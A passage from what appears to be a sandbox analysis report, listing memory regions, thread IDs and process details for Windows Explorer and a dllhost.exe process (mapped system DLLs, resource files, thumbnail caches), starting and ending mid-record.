= "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1008 start_va = 0x6130000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006130000" filename = "" Region: id = 1009 start_va = 0x7fef72b0000 end_va = 0x7fef72b5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\oregres.dll") Region: id = 1010 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1011 start_va = 0x5de0000 end_va = 0x5de3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 1012 start_va = 0x5de0000 end_va = 0x5de5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "unregmp2.exe.mui" filename = "\\Windows\\System32\\en-US\\unregmp2.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\unregmp2.exe.mui") Region: id = 1013 start_va = 0x6450000 end_va = 0x64a1fff monitored = 0 entry_point = 0x64975cc region_type = mapped_file name = "unregmp2.exe" filename = "\\Windows\\System32\\unregmp2.exe" (normalized: "c:\\windows\\system32\\unregmp2.exe") Region: id = 1014 start_va = 0x7fef72a0000 end_va = 0x7fef72a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\oregres.dll") Region: id = 1015 start_va = 0x5de0000 end_va = 0x5de3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 1016 start_va = 0x7fef4220000 end_va = 0x7fef4610fff monitored = 0 entry_point = 0x7fef43ad21c region_type = mapped_file name = "mf.dll" filename = "\\Windows\\System32\\mf.dll" (normalized: "c:\\windows\\system32\\mf.dll") Region: id = 1017 start_va = 0x7fef20e0000 end_va = 0x7fef214cfff monitored = 0 entry_point = 0x7fef20e131c region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1018 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1019 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1020 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1021 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1022 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1023 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1024 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1025 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1026 start_va = 0x5de0000 end_va = 0x5de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 1027 start_va = 0x5df0000 end_va = 0x5df3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 1028 start_va = 0x5e00000 end_va = 0x5e00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1029 start_va = 0x6450000 end_va = 0x6497fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006450000" filename = "" Region: id = 1030 start_va = 0x5c90000 end_va = 0x5c92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c90000" filename = "" Region: id = 1031 start_va = 0x5ca0000 end_va = 0x5ca2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ca0000" filename = "" Region: id = 1032 start_va = 0x5cb0000 end_va = 0x5cb2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 1033 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1034 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1035 start_va = 0x64a0000 end_va = 0x64f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 1036 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1037 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1038 start_va = 0x5c90000 end_va = 0x5c90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1039 start_va = 0xc410000 end_va = 0xd765fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1040 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1041 start_va = 0xd770000 end_va = 0xeac5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1042 start_va = 0x5cb0000 end_va = 0x5cb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1043 start_va = 0xead0000 end_va = 0xfe25fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1044 start_va = 0x5e20000 end_va = 0x5e20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1045 start_va = 0xfe30000 end_va = 0x11185fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1046 start_va = 0x64a0000 end_va = 0x64f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 1047 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1048 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1049 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1050 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1051 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1052 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1053 start_va = 0x70b10000 end_va = 0x71e65fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1054 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1055 start_va = 0x5c90000 end_va = 0x5c97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntshrui.dll.mui" filename = "\\Windows\\System32\\en-US\\ntshrui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ntshrui.dll.mui") Region: id = 1056 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1057 start_va = 0xc410000 end_va = 0xd765fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1058 start_va = 0x64a0000 end_va = 0x64f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 1059 start_va = 0x6f7b0000 end_va = 0x70b05fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1060 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1125 start_va = 0x5cb0000 end_va = 0x5cb2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 1126 start_va = 0x76a0000 end_va = 0x779ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1127 start_va = 0x77a0000 end_va = 0x789ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1128 start_va = 0x78a0000 end_va = 0x799ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1129 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1130 start_va = 0x5e10000 end_va = 0x5e10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1131 start_va = 0x5e20000 end_va = 0x5e20fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1318 start_va = 0xa600000 end_va = 0xa8bdfff monitored = 0 entry_point = 0xa62b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1319 start_va = 0x8ce0000 end_va = 0x8d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ce0000" filename = "" Region: id = 1320 start_va = 0x7feff9f0000 end_va = 0x7feffa06fff monitored = 0 entry_point = 0x7feff9f1070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1321 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1322 start_va = 0xa600000 end_va = 0xa7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a600000" filename = "" Region: id = 1323 start_va = 0xa7e0000 end_va = 0xaa9dfff monitored = 0 entry_point = 0xa80b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1826 start_va = 0x2600000 end_va = 0x2634fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1827 start_va = 0x2640000 end_va = 0x2642fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1828 start_va = 0x2650000 end_va = 0x265bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 1829 start_va = 0x2660000 end_va = 0x2662fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2003 start_va = 0x2670000 end_va = 0x2674fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2082 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 2083 start_va = 0x6350000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 2084 start_va = 0x67a0000 end_va = 0x689ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 2085 start_va = 0x2780000 end_va = 0x2780fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 2086 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 2087 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Thread: id = 10 os_tid = 0xe70 Thread: id = 11 os_tid = 0xdc0 Thread: id = 12 os_tid = 0xb44 Thread: id = 13 os_tid = 0x8f8 Thread: id = 14 os_tid = 0x8f4 Thread: id = 15 os_tid = 0x6c0 Thread: id = 16 os_tid = 0x228 Thread: id = 17 os_tid = 0x76c Thread: id = 18 os_tid = 0x1e4 Thread: id = 19 os_tid = 0x7a4 Thread: id = 20 os_tid = 0x674 Thread: id = 21 os_tid = 0x568 Thread: id = 22 os_tid = 0x570 Thread: id = 23 os_tid = 0x5ec Thread: id = 24 os_tid = 0x5d8 Thread: id = 25 os_tid = 0x5c8 Thread: id = 26 os_tid = 0x4c4 Thread: id = 27 os_tid = 0x5a8 Thread: id = 28 os_tid = 0x418 Thread: id = 29 os_tid = 0x7e4 Thread: id = 30 os_tid = 0x7e0 Thread: id = 31 os_tid = 0x7dc Thread: id = 32 os_tid = 0x7d0 Thread: id = 33 os_tid = 0x7cc Thread: id = 34 os_tid = 0x7c8 Thread: id = 35 os_tid = 0x7bc Thread: id = 36 os_tid = 0x7b4 Thread: id = 37 os_tid = 0x7ac Thread: id = 38 os_tid = 0x7a0 Thread: id = 39 os_tid = 0x79c Thread: id = 40 os_tid = 0x798 Thread: id = 41 os_tid = 0x794 Thread: id = 42 os_tid = 0x790 Thread: id = 43 os_tid = 0x78c Thread: id = 44 os_tid = 0x780 Thread: id = 45 os_tid = 0x77c Thread: id = 46 os_tid = 0xf90 Thread: id = 47 os_tid = 0xf94 Thread: id = 59 os_tid = 0xaa8 Thread: id = 81 os_tid = 0xd38 Process: id = "4" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x3c00b000" os_pid = "0xf9c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1061 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1062 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1063 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1064 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 1065 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1066 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1067 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1068 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1069 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1070 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1071 start_va = 0x3e0000 end_va = 0x567fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1072 start_va = 0x570000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1073 start_va = 0x700000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1074 start_va = 0x1b00000 end_va = 0x1b00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 1075 start_va = 0x1b70000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1076 start_va = 0x1c70000 end_va = 0x1d4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 1077 start_va = 0x1dd0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1078 start_va = 0x1ed0000 end_va = 0x219efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1079 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1080 start_va = 0x2320000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1081 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1082 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1083 start_va = 0x2630000 end_va = 0x26affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1084 start_va = 0x2810000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 1085 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1086 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1087 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1088 start_va = 0x77a50000 end_va = 0x77a56fff monitored = 0 entry_point = 0x77a5106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1089 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1090 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1091 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1092 start_va = 0xffd70000 end_va = 0xffd76fff monitored = 0 entry_point = 0xffd7124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 1093 start_va = 0x7fef3c40000 end_va = 0x7fef3c5efff monitored = 0 entry_point = 0x7fef3c457b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1094 start_va = 0x7fef3fa0000 end_va = 0x7fef403ffff monitored = 0 entry_point = 0x7fef401eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 1095 start_va = 0x7fefc120000 end_va = 0x7fefc175fff monitored = 0 entry_point = 0x7fefc12bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1096 start_va = 0x7fefc180000 end_va = 0x7fefc2abfff monitored = 0 entry_point = 0x7fefc1894bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1097 start_va = 0x7fefcdc0000 end_va = 0x7fefce06fff monitored = 0 entry_point = 0x7fefcdc1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1098 start_va = 0x7fefd0c0000 end_va = 0x7fefd0d7fff monitored = 0 entry_point = 0x7fefd0c3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 